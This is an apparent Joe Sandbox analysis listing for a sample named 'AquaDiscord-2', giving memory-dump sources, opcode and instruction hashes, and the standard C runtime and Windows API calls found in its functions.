                                                                                          • Instruction ID: 8d34c310d6f0dc3c7edf2c22cedc6615a0ee2de576a86db8095c40fc8420203b
                                                                                          • Opcode Fuzzy Hash: f10e1b89caa5f0af2320cf43a467604b392d0dbfd2f7703ade35199e203ab89f
                                                                                          • Instruction Fuzzy Hash: 58E04F3250012CBBCF122F64EC05AAE7FA6EF44751F008050FC15661A5CB72DD30AAD4
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00009B50), ref: 00AF9A2C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: 43ad439122f344062a04b87f18e696710b641f0f429314c45bb9cb5e151ecd75
                                                                                          • Instruction ID: 3d36f819ed54353f15f0f678581de5fa4d255c84026cd76724c20c9ebba2131d
                                                                                          • Opcode Fuzzy Hash: 43ad439122f344062a04b87f18e696710b641f0f429314c45bb9cb5e151ecd75
                                                                                          • Instruction Fuzzy Hash:
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapProcess
                                                                                          • String ID:
                                                                                          • API String ID: 54951025-0
                                                                                          • Opcode ID: 2c3afa98cab2f5131265b89d254b7db29ac053e614b9f70e23b87a6393ecff80
                                                                                          • Instruction ID: c0e1fe06e14218ca1ec0e7e774ceeec07616fa691a00c13602db846cd82cfbed
                                                                                          • Opcode Fuzzy Hash: 2c3afa98cab2f5131265b89d254b7db29ac053e614b9f70e23b87a6393ecff80
                                                                                          • Instruction Fuzzy Hash: 7FA011302002028FA3808F3AAA08A083AE8AA0028030880A8A828C20A0EF208080AF00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d449f0505dfae1040e2c6200dd404b11b2983969f9f08718f687224195c13878
                                                                                          • Instruction ID: 0ea567d43d83d2203c8e92cec9d878182a0e367bf47345aca2e690ae9e416968
                                                                                          • Opcode Fuzzy Hash: d449f0505dfae1040e2c6200dd404b11b2983969f9f08718f687224195c13878
                                                                                          • Instruction Fuzzy Hash: 1DD0923A641A58AFC210DF4DE440D41F7B8FB9E770B154566EA5893B20C735FC12CAE0
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(0311FDB0,0311FDB0,00000000,7FFFFFFF,?,00B1417D,0311FDB0,0311FDB0,00000000,0311FDB0,?,?,?,?,0311FDB0,00000000), ref: 00B14238
                                                                                          • __alloca_probe_16.LIBCMT ref: 00B142F3
                                                                                          • __alloca_probe_16.LIBCMT ref: 00B14382
                                                                                          • __freea.LIBCMT ref: 00B143CD
                                                                                          • __freea.LIBCMT ref: 00B143D3
                                                                                          • __freea.LIBCMT ref: 00B14409
                                                                                          • __freea.LIBCMT ref: 00B1440F
                                                                                          • __freea.LIBCMT ref: 00B1441F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                          • String ID:
                                                                                          • API String ID: 127012223-0
                                                                                          • Opcode ID: 002a847b3c3b740eca40e5c9c44b83a4c1252b3044b795f468c6c99b1fa1dcb2
                                                                                          • Instruction ID: 76f72c7b32d28c73103aa316c74637fba15b7a12b9e547d03cd3ac762f48a989
                                                                                          • Opcode Fuzzy Hash: 002a847b3c3b740eca40e5c9c44b83a4c1252b3044b795f468c6c99b1fa1dcb2
                                                                                          • Instruction Fuzzy Hash: CD71D472900209ABDF209E949C82FEF7BE9DF45710FA401A9F954B7281EB759CC18B90
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strrchr
                                                                                          • String ID:
                                                                                          • API String ID: 3213747228-0
                                                                                          • Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction ID: b200c6c7624529dbb8f642269eca5d42bf3319bcfef39f0b48d84d043b5aa0b7
                                                                                          • Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction Fuzzy Hash: 1FB14772A003559FDB118F28CC81BAE7FE5EF55350F2981E5E985AB2C2DA74DE01C7A0
                                                                                          APIs
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00AFABA7
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00AFABAF
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00AFAC38
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00AFAC63
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00AFACB8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                          • String ID: csm
                                                                                          • API String ID: 1170836740-1018135373
                                                                                          • Opcode ID: 3ebc4bf872d69b71fda10cdcba23a7e60047a5fedda88edca0f75e48489dfe5b
                                                                                          • Instruction ID: fb6ad181f5d02e6a630aa44203d67373f5f9f9455d94c5d2d986c9a4bf2a4bdf
                                                                                          • Opcode Fuzzy Hash: 3ebc4bf872d69b71fda10cdcba23a7e60047a5fedda88edca0f75e48489dfe5b
                                                                                          • Instruction Fuzzy Hash: 5B41A374A0021C9BCB10DFE8C884AEE7BB5AF15314F548195F9189B392C735AE02CF92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0754e697e449f82d512087502ab63cc8dc534b84cabd8bdc35f3ead1ee97a9bb
                                                                                          • Instruction ID: 213a3c20e7a820e38df6642c138cb051879c18ac5eff31a8ca3ab87eb43b0bdb
                                                                                          • Opcode Fuzzy Hash: 0754e697e449f82d512087502ab63cc8dc534b84cabd8bdc35f3ead1ee97a9bb
                                                                                          • Instruction Fuzzy Hash: A3B11370A04249AFDB15DFA8C885BEE7FF1EF49700F9441D8E405A7292EB719E92CB50
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,00B04424,00AFA93D,00AF9B94), ref: 00B0443B
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B04449
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B04462
                                                                                          • SetLastError.KERNEL32(00000000,00B04424,00AFA93D,00AF9B94), ref: 00B044B4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: ad6ffbff5a36d3de9f682a7fc170742d135d9f1fc7d7c6286aee00a4f8a3ee37
                                                                                          • Instruction ID: f465591a291b55a8200ef7bd17a2c7aad28961531b6013aa55d0e425cf012fdd
                                                                                          • Opcode Fuzzy Hash: ad6ffbff5a36d3de9f682a7fc170742d135d9f1fc7d7c6286aee00a4f8a3ee37
                                                                                          • Instruction Fuzzy Hash: FB0147B221A3126EF7393B79BCC5A6F2EC4EB9177572002B9FA11522F2EF514C425380
                                                                                          APIs
                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00B04E2B
                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 00B050A4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                          • String ID: csm$csm$csm
                                                                                          • API String ID: 2673424686-393685449
                                                                                          • Opcode ID: 3126fa057f703c9550acbe18c13fbe1f947b9beec8b0cc918a924364b50356fc
                                                                                          • Instruction ID: 382cb8e3033d6e93f218cc63b96781ccaf46da17462efce920fd4da573770520
                                                                                          • Opcode Fuzzy Hash: 3126fa057f703c9550acbe18c13fbe1f947b9beec8b0cc918a924364b50356fc
                                                                                          • Instruction Fuzzy Hash: E9B15AB1800209EFCF28DFA4C9819AEBBF5FF14310B1445EAEA156B692D731DA51CF91
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F5340F7A,?,?,00000000,00B15644,000000FF,?,00AFF279,00AFF160,?,00AFF315,00000000), ref: 00AFF1ED
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AFF1FF
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00B15644,000000FF,?,00AFF279,00AFF160,?,00AFF315,00000000), ref: 00AFF221
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: 9e2d61e13461fb4397d7e99ec1613535c650c9a082faaf5e63cffc420cb97ada
                                                                                          • Instruction ID: bef586201695dd0bc749766bf388aa54035ab419f69b0568bcee6d4715e3a696
                                                                                          • Opcode Fuzzy Hash: 9e2d61e13461fb4397d7e99ec1613535c650c9a082faaf5e63cffc420cb97ada
                                                                                          • Instruction Fuzzy Hash: 2B01A231994619AFDB118F94DC09FFEBBF8FB04B11F404625F821A22E0DB749900CA94
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 00AF77B9
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AF77C4
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7832
                                                                                            • Part of subcall function 00AF76AF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00AF76C7
                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 00AF77DF
                                                                                          • _Yarn.LIBCPMT ref: 00AF77F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                          • String ID:
                                                                                          • API String ID: 1088826258-0
                                                                                          • Opcode ID: c7c29074cab5524af70d5ab021fc11d53fbb774ae87d184f5868412de22c2e1b
                                                                                          • Instruction ID: 44b0e4060de4082361ca372aac8ae43fe9ecc48c7dde50353a9bc09a4a1b15f7
                                                                                          • Opcode Fuzzy Hash: c7c29074cab5524af70d5ab021fc11d53fbb774ae87d184f5868412de22c2e1b
                                                                                          • Instruction Fuzzy Hash: 8201DF75A001288FCB09EFA4C9455BD7BA1FFE4390B544049FA1257381CF34AE82CBC1
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00B0F70C,00000000,?,00B21E20,?,?,?,00B0F643,00000004,InitializeCriticalSectionEx,00B190D4,00B190DC), ref: 00B0F67D
                                                                                          • GetLastError.KERNEL32(?,00B0F70C,00000000,?,00B21E20,?,?,?,00B0F643,00000004,InitializeCriticalSectionEx,00B190D4,00B190DC,00000000,?,00B0535C), ref: 00B0F687
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00B0F6AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID: api-ms-
                                                                                          • API String ID: 3177248105-2084034818
                                                                                          • Opcode ID: fabb5d5330efa8095e8f22c6a51e4250ab4c255adae3351d6e41970bac349878
                                                                                          • Instruction ID: 49b09f0a3350a0250f59da9ec9532a3ab1702894e4632ccb850bf16cd7ba8a66
                                                                                          • Opcode Fuzzy Hash: fabb5d5330efa8095e8f22c6a51e4250ab4c255adae3351d6e41970bac349878
                                                                                          • Instruction Fuzzy Hash: 2CE01231740209B6EB301BA0DC0ABA93F99DB50BD0F544070FD1CA84F1DB62E8909544
                                                                                          APIs
                                                                                          • GetConsoleOutputCP.KERNEL32(F5340F7A,00000000,00000000,?), ref: 00B0D771
                                                                                            • Part of subcall function 00B057C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B06F95,?,00000000,-00000008), ref: 00B05822
                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B0D9C3
                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B0DA09
                                                                                          • GetLastError.KERNEL32 ref: 00B0DAAC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                          • String ID:
                                                                                          • API String ID: 2112829910-0
                                                                                          • Opcode ID: 26439a23073797621ddbb2b86d8e619891e7f9bafb458ff48d1f62c041eb2cf7
                                                                                          • Instruction ID: 7edbf8b0c0502437228be2dab370089564d7a5189b1b1f1311a399b3922e9019
                                                                                          • Opcode Fuzzy Hash: 26439a23073797621ddbb2b86d8e619891e7f9bafb458ff48d1f62c041eb2cf7
                                                                                          • Instruction Fuzzy Hash: 4AD15A75E042589FDB15CFE8C880AEDBBF5FF48314F2441AAE556EB292D630A942CB50
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPointer
                                                                                          • String ID:
                                                                                          • API String ID: 1740715915-0
                                                                                          • Opcode ID: 2d2da4bf046a934360c0974aa104be04f482c53fc138b09c2f7dbd720afbb5fb
                                                                                          • Instruction ID: 58bd2319bd6077c075deca4ee512f4250ec2a9a0ff370083ca2a0f0de05c304c
                                                                                          • Opcode Fuzzy Hash: 2d2da4bf046a934360c0974aa104be04f482c53fc138b09c2f7dbd720afbb5fb
                                                                                          • Instruction Fuzzy Hash: 8B51D1F2604606AFDB288F54D981BBABBE4EF54311F2445ADEB09876D0E731EC40CB94
                                                                                          APIs
                                                                                            • Part of subcall function 00B057C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B06F95,?,00000000,-00000008), ref: 00B05822
                                                                                          • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00B0B59A
                                                                                          • __dosmaperr.LIBCMT ref: 00B0B5A1
                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00B0B5DB
                                                                                          • __dosmaperr.LIBCMT ref: 00B0B5E2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1913693674-0
                                                                                          • Opcode ID: 75dbb3cb892ee9e1102de9201b21fb3058a1bcbd5d327ce6e3f3c78f376944ea
                                                                                          • Instruction ID: 958ae5f1893c1ddd581a724669b0f7c90760220ec344b2143b6e26b9dfcec64d
                                                                                          • Opcode Fuzzy Hash: 75dbb3cb892ee9e1102de9201b21fb3058a1bcbd5d327ce6e3f3c78f376944ea
                                                                                          • Instruction Fuzzy Hash: D521807160020AEFDB20AF66CC91C6BBFE9EF1436471085E8F929975D1EB30ED408B90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
